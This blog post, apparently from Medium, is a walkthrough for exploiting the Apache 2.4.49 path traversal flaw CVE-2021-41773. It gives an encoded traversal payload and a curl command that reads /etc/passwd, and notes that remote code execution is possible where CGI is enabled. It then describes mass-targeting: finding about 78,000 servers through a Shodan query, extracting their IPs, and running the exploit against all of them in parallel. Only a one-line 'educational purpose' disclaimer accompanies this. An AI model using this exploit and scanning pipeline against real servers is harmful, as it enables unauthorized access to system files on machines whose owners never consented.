Finding and Exploiting Path traversal in apache 2.4.49 http server [CVE-2021–41773]

In October 4th Apache disclosed a vulnerability introduced on Apache HTTP Server 2.4.49 marked as CVE-2021–41773.At the same time Apache released a patch for this vulnerability with its new version 2.4.50 . This vulnerability allows an attacker to bypass path traversal protection using encoding . Bypass looks something like this.

.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

Its also possible to perform rce [Remote code execution] if mode_cgi is enabled . Modern web-technology doesn’t use it anymore however old website which usage old technology are still using this functionality. Exploitation process is easy which can be performed with curl also. Lets see how we can find websites using this apache version. We will use our favorite search engine shodan.io . Using this simple query we can find potentially vulnerable apache 2.4.49 http server.

"Apache/2.4.49"

We Got 78,219 results , those server usage apache 2.4.49 but all of them are not vulnerable , we need to filter the vulnerable ones , we can do that using bash , lets mix up our script with exploit. Exploit with curl was something like that.

curl --silent --path-as-is --insecure -k "target/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

This only exploits the server and shows us the content/text of /etc/passwd. lets create a detection script with it .

Now lets download the results from shodan. But our script takes one argument at a time how can we give it multiple input .

We can filter ip from the downloaded result using regex.

cat aa4dfdb4-faba-43a1-8784-9cce0c8f46e9.json | grep -Po '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'| tee -a ip.txt

We stored all the ip on ip.txt , now lets scan it for vulnerability using our bash and xargs

cat ip.txt | xargs -n1 -P10 bash poc.sh | tee -a results.txt

we can use httprobe to detect if the target use http or https protocol.

for bug hunters , you can use the same process with all the subdomains you got.

cat subdomains.txt | httprobe | xargs -n1 -P10 bash poc.sh | tee -a result.txt

[ This article was for educational and research purpose only , we do not promote to harm others property without permission.]

--

--

--

Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Property Management Contract Or Co-hosting Agreement For Airbnb

{UPDATE} Square Me - Freaking Color Hack Free Resources Generator

What is dns and how it works?

{UPDATE} Guess the Rock Band Hack Free Resources Generator

The challenge of implementing iOS share extension for end-to-end encrypted messenger

Relayer installation. Cross-chain transactions between KiChain and Umee

Major LinkedIn Exposure

HTS Virtual Private Servers: Powered by AMD EPYC™ 3rd Gen Processors!

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Joy Ghosh

Joy Ghosh

Security Researchers | Ctf Player | Web-Application Pen-tester | Programmer

More from Medium

Kerberos Network Authentication Service

Hashing & Salting Part 2

Intigriti’s January XSS challenge By TheRealBrenu

Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql